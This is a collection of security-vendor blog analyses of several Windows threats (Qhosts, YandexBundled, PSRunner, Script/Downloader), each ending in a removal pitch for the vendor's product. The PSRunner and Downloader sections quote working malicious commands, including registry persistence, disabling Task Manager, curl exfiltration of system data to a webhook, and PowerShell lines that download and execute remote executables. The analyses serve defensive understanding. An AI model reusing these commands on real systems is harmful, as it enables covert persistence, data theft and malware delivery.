C:\Program Files (x86)\Windows Defender\MpClient.dll
C:\Program Files (x86)\Windows Defender\MpOAV.dll
C:\Program Files (x86)\Windows Defender\MsMpLics.dll
C:\Program Files\Windows Defender\MsMpLics.dll
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2102.4-0\X86\MpOav.dll

Delivering the Payload

The malware then drops files into the system’s temporary directory. Among these files are both the payload and the files necessary for Windows activation. Regarding the former, the files include:

C:\Users\user\AppData\Local\Temp\RarSFX0\Install.cmd
C:\Users\user\AppData\Local\Temp\RarSFX0\bin\bootsect.exe
C:\Users\user\AppData\Local\Temp\RarSFX0\bin\grldr

It also drops a large number of certificates into the folder C:\Users\user\AppData\Local\Temp\RarSFX0\certs.

Malicious Activity

Next, the malware creates several new processes from the temporary folder, then creates and runs additional executable files.

C:\Users\\AppData\Local\Temp\RarSFX0\MSG.exe
C:\Users\\AppData\Local\Temp\RarSFX0\VLD.exe

The malware then executes Visual Basic scripts (install.vbs) using cscript.exe:

cscript //nologo "C:\Users\\AppData\Local\Temp\RarSFX0\install.vbs"
cscript //nologo C:\Windows\system32\slmgr.vbs -ipk HERE-GOES-WINDOWS-ACTIVATION-KEY

As you might have guessed, this script installs a license key into the system. That is actually one of the dangers of this malware: the victim sees the system activation process and thinks everything is fine. But meanwhile, the malware does its dirty job in the background.

Gaining Persistence

The actions of the program do not end there; the malware continues with establishing persistence in the system. This specific sample appears to work as a dropper, so maintaining constant access to the system is crucial. To achieve this, it modifies settings in HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows and other system-level keys to ensure it can survive reboots and maintain control over the system. Additionally, the malware manipulates the following keys:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.100\CheckSetting
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.101\CheckSetting
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.102\CheckSetting

The first four keys are associated with checks performed by the Security and Maintenance feature in Windows. Each “CheckSetting” entry can correspond to specific checks such as firewall status, antivirus status, etc. This information also goes as a part of system fingerprinting – action that all malware does to distinguish attacked systems.

Hosts File Manipulation

The malware then proceeds to manipulate the hosts file. To do this, it creates a specific registry key:

HKEY_CURRENT_USER\SOFTWARE\WinRAR SFX\C%%Windows%System32%drivers%etc

This key is associated with self-extracting WinRAR archives. Based on the path, it is linked to a WinRAR operation affecting the hosts file. The malware drops a temporary file named __tmp_rar_sfx_access_check_34985937, which WinRAR creates during the extraction process of the self-extracting archive (SFX). The filename indicates a temporary access check to ensure the program has sufficient rights to overwrite the hosts file in this directory. Subsequently, the malware replaces the Hosts file with the one it needs.

This could be done for several reasons:

1. To prevent the system from contacting the license verification server, ensuring that the illegal activation remains in place.
2. To block system or anti-malware updates.
3. To redirect the user to fraudulent websites.

How To Remove Trojan:Win32/Qhosts?

Removing Trojan:Win32/Qhosts involves several steps and requires an advanced anti-malware solution. GridinSoft Anti-Malware is the one that you can rely on in this question. Initially, you need to clean the system of malware. After cleaning the system, you need to restore the hosts file. Follow the instructions below for each of the steps.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Restore the Hosts File

1. Go to the Tools tab and click Reset Browser Settings.

   

2. Uncheck all boxes except for the one next to the HOSTS file and click Reset.
   

By following these steps, your system will be fully restored and ready for use.

The post Trojan:Win32/Qhosts appeared first on Gridinsoft Blog.

What is PUABundler:Win32/YandexBundled?

PUABundler:Win32/YandexBundled is a generic detection name used by Windows Defender for potentially unwanted software from the Russian company Yandex. While Yandex and its products are legitimate (putting aside the fact that the company is Russian, which we’ll discuss later), their software distribution methods have led most anti-malware vendors to flag them as potentially unwanted.

Once installed, YandexBundled installs its software and makes changes to system settings and the current browser without the user’s explicit permission. It modifies the browser’s homepage and default search engine. Early versions of Yandex software integrated so deeply into the system that they were almost impossible to remove manually. Now, it is easier to do, but the overall daring behavior of the program, along with unwanted sources, is what forces security vendors into flagging it.

Spreading Methods

There is an official Yandex product page, though it’s rare for users to intentionally download Yandex software. There are several primary methods of spreading PUABundler:Win32/YandexBundled:

Software Bundles. In this case, the program is usually included in the installation package of other software that the user intends to install. This is especially common with cracked repacks of paid software by Russian repackers.

“Recommended Software” in Free Programs. This is one of the few ways to monetize free software and a legal way to distribute potentially unwanted software. The only problem is that sometimes unscrupulous developers hide the checkboxes for installing additional software. As a result, the user cannot opt out of the installation.

Runtime Analysis

As mentioned earlier, one of the big issues with YandexBundled is the way it gets to the system. To demonstrate this, I found a sample that distributes Yandex software. This is a typical example of a bundled installer for various questionable programs. The file itself is called TapSetup.exe; I’ve encountered the same file name in the selection of software from the same website, mostly to cracked applications.

As we can see in the screenshot above, the icing on the cake is the footer of the installation window, where all checkboxes are enabled by default. This means that by clicking “Next,” Yandex software will be installed. Considering that people tend to click through the installation menus, all this junk may get in.

Unwanted Activity & Data Collection

After installation, users are greeted with a browser that promotes Russian services and sites. Moreover, regardless of the browser you use, the unwanted software changes settings and adds its extension to all installed browsers on the system. That is suboptimal at least for being an automated action, that happens without your consent. However, there is one more concerning thing to talk about.

As I mentioned earlier, this is a Russian company, and in Russia, the “Sovereign Internet Law” is in effect. This means that all traffic should be recorded and kept on software providers’ servers. It may be accessed on demand by law enforcement without any additional permits. This is the key concern of having and using any Russian software on your computer. Even though similar speculations revolve around US companies and the FBI, the latter still requires a court order to access the information. And, well, you won’t likely be a point of interest for the feds unless you do something illegal.

Legal State Keylogger

One particular program that installs YandexBundler is Punto Switcher, a software whose developer Yandex acquired some time ago. In short, this program automatically switches the keyboard layout between multiple languages. As you might guess, for such an application to work correctly, it needs to read keystrokes, essentially functioning as a keylogger. Additionally, the application has a journaling feature that saves all entered information to a file. And since the program freely connects to the Internet, there is a high chance of this data ending up on Yandex servers.

Not only does Punto Switcher serve as a legal method for distributing PUABundler:Win32/YandexBundled (see the image below), but it also provides an excellent opportunity to legally monitor users. Although the application offers the option to disable auto-switching, it is unlikely that this would disable keystroke logging.

Technical Analysis

Let’s briefly look at the technical aspects of PUABundler:Win32/YandexBundled to determine how dangerous this unwanted software really is. One of the main concerns is that this software reads user/profile data from web browsers:

c:\Users\user\appdata\local\google\chrome\user data\default\history
c:\Users\user\appdata\local\google\chrome\user data\default\history-journal
c:\Users\user\appdata\local\google\chrome\user data\default\local storage\leveldb\current
c:\Users\user\appdata\local\google\chrome\user data\default\preferences
c:\Users\user\appdata\local\google\chrome\user data\default\top sites

While the program likely gets the profile info to transfer it to Yandex, this is once again the example of unauthorized access. Yandex software simply doesn’t care whether you want this to happen or not, it just does this – and consequently collects all of your data from this profile.

It gets even more concerning when we have a look at registry keys that the program accesses. It methodically goes through entries that contain information about installed programs and geolocation.

\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\International\Geo\Nation
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall

While there may be a legitimate reason for the program to get this information, the overall nature of the software makes such sharing questionable.

How to Remove PUABundler:Win32/YandexBundled?

If you encounter PUABundler:Win32/YandexBundled, there are two ways to remove it. The first, and less effective, method is manual removal. The second, and recommended, method is using specialized tools. Since this unwanted software embeds itself deeply in the system, I recommend using the second method. GridinSoft Anti-Malware is an optimal solution, as it not only removes threats with just two clicks but also allows resetting browser settings with one click. This will remove all unwanted extensions and homepage settings.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post PUABundler:Win32/YandexBundled appeared first on Gridinsoft Blog.

Trojan:BAT/PSRunner.VS!MSR Overview

Trojan:BAT/PSRunner.VS!MSR is a type of malware detection identifier used by Microsoft Defender antivirus. This heuristic detection applies to batch files (.bat), which are scripts that can execute a series of commands in Windows via PowerShell. Typically, it downloads and executes additional malicious software, making it a simplified version of a dropper. Although less flexible, PSRunner is still capable of making quite a mess in the system.

Typically, it is spread through email attachments in phishing campaigns. This is the most popular tactic, where emails appear to come from legitimate sources, prompting recipients to open the attachment or click on malicious links. Additionally, the trojan can be downloaded from pirate or malicious websites in the form of cheats and mods for games. In that case, the disguise is not an attachment, but the entire game installer that serves a shell around the malignant script.

Technical Analysis

Let’s delve deeper into how Trojan:BAT/PSRunner.VS!MSR behaves after it infiltrates a system. As a .bat file, it lacks advanced features like sandbox or debugger checks. However, it still attempts to operate as stealthily as possible to avoid detection by the user. Upon execution, it hides itself from the PowerShell window using the following command:

attrib +h +s %0

Persistence

Next, the malware takes steps to establish persistence in the system. It executes the following commands:

set valinf="rundll32_%randoM%_toolbar"
set reginf="hklm\Software\Microsoft\Windows\CurrentVersion\Run"
reg add %rEgINf% /v %VaLinf% /t "REG_SZ" /d %0 /f > nul
copy %0 "%uSERPROFILE%\Start Menu\Programs\Startup"
echo start "" %0>>%SystemDrive%\auTOexec.baT
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %WINDir%\%a%.bat /f > nul

By doing this, the malicious script creates multiple registry entries, enabling it to run at every system startup. Additionally, it copies the script to the user’s Startup folder to ensure it launches upon system login.

As mentioned earlier, this is simply a script using PowerShell. Unlike more advanced malware, it cannot hide in the Task Manager. This means the user can terminate the process by ending the PowerShell process in the Task Manager. Therefore, the malware’s next step is to disable the Task Manager. It adds the following registry key:

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul

Gathering Information

Next, the malware collects various information about the system. This process is often referred to as system fingerprinting. In this case, the fingerprint is quite detailed. The malware executes the following command:

powershell -Command "Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table >%usErPrOfiLE%\apps.txt"
curl -v -F "chat_id=-655682538" -F document=@%uSERPRoFILE%\apps.txt %WEbHooK%

This command saves a list of installed applications to a text file named apps.txt and sends it to a remote server. The script then gathers system information into a file named userdata.txt using the following commands:

echo Username %usERnAME% >> userdata.txt
echo IP %IPV4% >> userdata.txt
echo. >> userdata.txt
ipconfig >> userdata.txt
echo. >> userdata.txt
getmac >> userdata.txt
echo. >> userdata.txt
wmic cpu get caption name, deviceid, numberofcores maxclockspeed, status >> userdata.txt
echo. >> userdata.txt
wmic computersystem get totalphysicalmemory >> userdata.txt
echo. >> userdata.txt
wmic partition get name,size,type >> userdata.txt
echo. >> userdata.txt
systeminfo >> userdata.txt
echo. >> userdata.txt
wmic path softwareLicensingService get OA3xOriginalProductKey >> userdata.txt
echo. >> userdata.txt
echo. >> userdata.txt
echo. >> userdata.txt

After gathering this information, it sends the file to a remote server with the following command:

cu rl -v -F "chat_id=-655682538" -F document=@%useRpRofIlE%\userdata.txt %WEBHOOk%
del userdata.txt
del apps.txt

By doing this, the malware retrieves and transmits extensive system details, including installed applications, network configurations, hardware specifications, and system information. Finally, it deletes the files userdata.txt and apps.txt to cover its tracks.

Payload

The final stage of the script’s execution involves running the following command:

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe', 'GetToken.exe') "
start GetToken.exe
ping 127.0.0.1 3 > "e.txt"
start GetToken.exe

As we can see, the script uses PowerShell to download an executable file named GetToken.exe from Discord servers and then runs it. All the naming of the involved files are made to create the least suspicion.

How To Remove Trojan:BAT/PSRunner.VS!MSR?

To remove Trojan:BAT/PSRunner.VS!MSR, you need to use an advanced anti-malware solution with a heuristic module. Additionally, it is crucial to maintain continuous system protection to prevent future infections. GridinSoft Anti-Malware is an excellent choice because, in addition to proactive protection, it has an Internet Security module. This will block potentially unsafe sites, thus preventing the infection process at the earliest stage.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post Trojan:BAT/PSRunner.VS!MSR appeared first on Gridinsoft Blog.

Trojan:Script/Downloader!MSR Overview

Trojan:Script/Downloader!MSR is a heuristic detection of Microsoft Defender that flags a small malware downloading script. Unlike a full-fledged dropper, this malicious thing is in fact disposable: it never runs again after execution. This loader executes a selection of commands in PowerShell or Command Prompt, which triggers Microsoft Defender. But since this detection is heuristic, and malicious activity comes from the activity within the PS environment, the built-in antivirus says that the powershell.exe is in question.

Trojan:Script/Downloader!MSR is typically spread through common malware methods such as game mods, pirated games, software, activators (KMS), and keygens. It is also distributed under the guise of legitimate files, masked with double extension and an altered file icon. As for the payload, Trojan:Script/Downloader!MSR most often delivers spyware, remote administrative tools, and ransomware.

Technical Analysis

Let’s get into Trojan:Script/Downloader!MSR operations on the target system by analysing the scripts this malware may use. By its nature, it does not perform any checks for the presence of a sandbox. Instead, it immediately executes its function—dropping the payload:

powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue' -ScriptBlock { (New-Object System.Net.WebClient).DownloadFile('http://5.252.161.59:8880/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe' }

As we can see, the malicious script uses PowerShell to download and execute a malicious file. It employs the ExecutionPolicy Bypass parameter to run the script without security restrictions. -NoExit makes the console window persistent, i.e. it does not close once the command execution is over, so the script can execute other commands. It also uses -WindowStyle Hidden to hide the PowerShell window, so the user does not notice its execution. Next, the Start-Process command ‘C:\\test-MDATP-test\\invoice.exe’} executes the downloaded file.

Basic Code Obfuscation

Although this is a fairly primitive loader script, some obfuscation may be used to make the detection harder. Below, you can see one of the intermediary commands that the script can execute to add a specific registry key. This key may further be a foothold for the malware the script will deploy, for gaining persistence or storing valuable data.

reg.exe add "HKEY_CURRENT_USER\Software\Classes\AppProgram" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))

This way, the malware adds a new registry key and sets its value to a base64-encoded string. The base64-encoded shell code looks like this:

powershell.exe -e #{JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==}

Even though the malware has an encryption key, the obfuscation makes it harder to detect.

Is Trojan:Script/Downloader!MSR a False Positive?

Sometimes, Trojan:Script/Downloader!MSR can be detected by antivirus software as a false positive. This mostly occurs when a program lacks a valid certificate and accesses the internet. In some cases, detection happens when the program contacts suspicious IP addresses. Regardless, it is always essential to check such detections to rule out any real threats.

For these purposes, I recommend using GridinSoft Anti-Malware. In addition to scanning and cleaning your system, it provides proactive device protection and Internet Security, which will prevent threats even at the download stage.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post Trojan:Script/Downloader!MSR appeared first on Gridinsoft Blog.